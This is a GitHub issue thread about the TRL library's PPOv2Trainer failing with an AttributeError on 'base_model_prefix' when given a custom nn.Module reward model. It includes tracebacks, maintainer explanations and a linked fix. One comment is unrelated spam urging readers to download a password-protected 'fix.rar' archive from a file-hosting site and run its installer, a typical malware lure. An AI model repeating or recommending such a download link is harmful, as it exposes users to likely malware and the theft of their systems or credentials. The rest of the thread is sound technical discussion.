### ISSUE TITLE
`PPOv2Trainer` `reward_model` throws `AttributeError: '<My Custom Class>' object has no attribute 'base_model_prefix'`

### ISSUE THREAD

**Issue by RylanSchaeffer** [huggingface/trl#1977]
### System Info

- `transformers` version: 4.44.0
- Platform: Linux-5.4.0-162-generic-x86_64-with-glibc2.31
- Python version: 3.11.9
- Huggingface_hub version: 0.23.4
- Safetensors version: 0.4.3
- Accelerate version: 0.32.1
- Accelerate config:    - compute_environment: LOCAL_MACHINE
        - distributed_type: FSDP
        - mixed_precision: bf16
        - use_cpu: False
        - debug: True
        - num_processes: 2
        - machine_rank: 0
        - num_machines: 1
        - rdzv_backend: static
        - same_network: True
        - main_training_function: main
        - enable_cpu_affinity: False
        - fsdp_config: {'fsdp_activation_checkpointing': True, 'fsdp_auto_wrap_policy': 'TRANSFORMER_BASED_WRAP', 'fsdp_backward_prefetch': 'BACKWARD_PRE', 'fsdp_cpu_ram_efficient_loading': True, 'fsdp_forward_prefetch': True, 'fsdp_offload_params': True, 'fsdp_sharding_strategy': 'FULL_SHARD', 'fsdp_state_dict_type': 'SHARDED_STATE_DICT', 'fsdp_sync_module_states': True, 'fsdp_use_orig_params': True}
        - downcast_bf16: no
        - tpu_use_cluster: False
        - tpu_use_sudo: False
        - tpu_env: []
        - dynamo_config: {'dynamo_backend': 'EAGER'}
- PyTorch version (GPU?): 2.4.0+cu121 (True)
- Tensorflow version (GPU?): not installed (NA)
- Flax version (CPU?/GPU?/TPU?): not installed (NA)
- Jax version: not installed
- JaxLib version: not installed
- Using distributed or parallel set-up in script?: No
- Using GPU in script?: Yes
- GPU type: NVIDIA A100-SXM4-80GB

### Information

- [X] The official example scripts
- [ ] My own modified scripts

### Tasks

- [X] An officially supported task in the `examples` folder
- [ ] My own task or dataset (give details below)

### Reproduction

Note that In `PPOv2Trainer`, the type annotation for `reward_model` is `nn.Module`: https://github.com/huggingface/trl/blob/main/trl/trainer/ppov2_trainer.py#L77

However, when I pass in `nn.Module` object (a class `StrInputRewardModelEnsemble` I created myself which inherits from `nn.Module`), I receive the error:

`AttributeError: 'StrInputRewardModelEnsemble' object has no attribute 'base_model_prefix'`

The error occurs here: https://github.com/huggingface/trl/blob/main/trl/trainer/ppov2_trainer.py#L58

### Expected behavior

I think `PPOv2Trainer` either needs better documentation or better type annotations to specify what _exactly_ is expected for the `RewardModel`.

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by haimianxing** [comment]
I also encountered this error when I try to use RLootTrainer by using AutoModelForCausalLMWithValueHead. 


[rank3]: Traceback (most recent call last):
[rank3]:   File "/mnt/data2/zcz/infer/utils/./accelerate_torch.py", line 262, in <module>
[rank3]:     trainer.train()
[rank3]:   File "/mnt/data2/zcz/.miniconda3_14/envs/_torch_env/lib/python3.9/site-packages/trl/trainer/rloo_trainer.py", line 352, in train
[rank3]:     _, score, _ = get_reward(
[rank3]:   File "/mnt/data2/zcz/.miniconda3_14/envs/_torch_env/lib/python3.9/site-packages/trl/trainer/utils.py", line 1128, in get_reward
[rank3]:     lm_backbone = getattr(model, model.base_model_prefix)
[rank3]:   File "/mnt/data2/zcz/.miniconda3_14/envs/_torch_env/lib/python3.9/site-packages/deepspeed/runtime/engine.py", line 517, in __getattr__
[rank3]:     raise AttributeError(f"'{type(self).__name__}' object has no attribute '{name}'")
[rank3]: AttributeError: 'DeepSpeedEngine' object has no attribute 'base_model_prefix'

**Comment by rahulgithub** [comment]
`---------------------------------------------------------------------------
AttributeError                            Traceback (most recent call last)
Cell In[29], [line 3](vscode-notebook-cell:?execution_count=29&line=3)
      [1](vscode-notebook-cell:?execution_count=29&line=1) from transformers import GenerationConfig 
      [2](vscode-notebook-cell:?execution_count=29&line=2) gpt2_model.generation_config = GenerationConfig()
----> [3](vscode-notebook-cell:?execution_count=29&line=3) ppo_trainer = PPOTrainer(
      [4](vscode-notebook-cell:?execution_count=29&line=4)     config,  gpt2_tokenizer,model=gpt2_model, ref_model=gpt2_ref_model, train_dataset=dataset, reward_model= reward_model, data_collator=collator
      [5](vscode-notebook-cell:?execution_count=29&line=5) )

File ~/Documents/work/rlhf/.venv/lib/python3.10/site-packages/trl/trainer/ppo_trainer.py:222, in PPOTrainer.__init__(self, args, processing_class, model, ref_model, reward_model, train_dataset, value_model, data_collator, eval_dataset, optimizers, callbacks, peft_config)
    [220](https://file+.vscode-resource.vscode-cdn.net/Users/manu/Documents/work/rlhf/examples/~/Documents/work/rlhf/.venv/lib/python3.10/site-packages/trl/trainer/ppo_trainer.py:220)     if module is not None:
    [221](https://file+.vscode-resource.vscode-cdn.net/Users/manu/Documents/work/rlhf/examples/~/Documents/work/rlhf/.venv/lib/python3.10/site-packages/trl/trainer/ppo_trainer.py:221)         disable_dropout_in_model(module)
--> [222](https://file+.vscode-resource.vscode-cdn.net/Users/manu/Documents/work/rlhf/examples/~/Documents/work/rlhf/.venv/lib/python3.10/site-packages/trl/trainer/ppo_trainer.py:222) self.model = PolicyAndValueWrapper(self.policy_model, self.value_model)
    [223](https://file+.vscode-resource.vscode-cdn.net/Users/manu/Documents/work/rlhf/examples/~/Documents/work/rlhf/.venv/lib/python3.10/site-packages/trl/trainer/ppo_trainer.py:223) self.model.config = self.policy_model.config  # needed for pushing to hub
    [224](https://file+.vscode-resource.vscode-cdn.net/Users/manu/Documents/work/rlhf/examples/~/Documents/work/rlhf/.venv/lib/python3.10/site-packages/trl/trainer/ppo_trainer.py:224) self.create_optimizer_and_scheduler(
    [225](https://file+.vscode-resource.vscode-cdn.net/Users/manu/Documents/work/rlhf/examples/~/Documents/work/rlhf/.venv/lib/python3.10/site-packages/trl/trainer/ppo_trainer.py:225)     num_training_steps=args.num_total_batches
    [226](https://file+.vscode-resource.vscode-cdn.net/Users/manu/Documents/work/rlhf/examples/~/Documents/work/rlhf/.venv/lib/python3.10/site-packages/trl/trainer/ppo_trainer.py:226) )  # note that we are calling `self.lr_scheduler.step()` manually only at the batch level

File ~/Documents/work/rlhf/.venv/lib/python3.10/site-packages/trl/trainer/ppo_trainer.py:89, in PolicyAndValueWrapper.__init__(self, policy, value_model)
     [87](https://file+.vscode-resource.vscode-cdn.net/Users/manu/Documents/work/rlhf/examples/~/Documents/work/rlhf/.venv/lib/python3.10/site-packages/trl/trainer/ppo_trainer.py:87) self.policy = policy
     [88](https://file+.vscode-resource.vscode-cdn.net/Users/manu/Documents/work/rlhf/examples/~/Documents/work/rlhf/.venv/lib/python3.10/site-packages/trl/trainer/ppo_trainer.py:88) self.value_model = value_model
---> [89](https://file+.vscode-resource.vscode-cdn.net/Users/manu/Documents/work/rlhf/examples/~/Documents/work/rlhf/.venv/lib/python3.10/site-packages/trl/trainer/ppo_trainer.py:89) self.critic_backbone = getattr(value_model, value_model.base_model_prefix)`

**Comment by rahulgithub** [comment]
TRL v14 needs updated examples and documentation. Its all broken at the moment

**Comment by qgallouedec** [comment]
Hey, sorry for the very slow reply catching up on the backlog.

The issue is real: `reward_model` and `value_model` are typed as `nn.Module` but in practice they must expose a transformers-style `base_model_prefix`, so a plain `nn.Module` subclass like yours will break. Note that PPO has since moved to `trl.experimental.ppo`, same code, just a new import path. Keeping this open as a contribution opportunity.

**Comment by albertvillanova** [comment]
@RylanSchaeffer confirming this is still live on current main. PPO now lives in `trl.experimental.ppo`, and both `reward_model` and `value_model` are annotated `nn.Module` but in practice must be `AutoModelForSequenceClassification`-style models — the trainer does `getattr(value_model, value_model.base_model_prefix)` and `value_model.score(...)` (see https://github.com/huggingface/trl/blob/d71a6ca90806bd6dc62cdea5cc26b69f4c376403/trl/experimental/ppo/ppo_trainer.py#L289-L302), and the reward path does the same in `get_reward` (https://github.com/huggingface/trl/blob/d71a6ca90806bd6dc62cdea5cc26b69f4c376403/trl/experimental/utils.py#L532). 

Your `StrInputRewardModelEnsemble` is a plain `nn.Module`, so it has neither `base_model_prefix` nor `.score`, hence the error. 

The fix: tighten the type hints/docstrings to a sequence-classification `PreTrainedModel` and document the `base_model_prefix` + `.score` contract (the examples build these via `AutoModelForSequenceClassification.from_pretrained(..., num_labels=1)`). Note the old RLOO `get_reward` failure from the earlier comments no longer applies — RLOO was reworked to accept arbitrary `reward_funcs`.

I opened a fixing PR:
- #6202
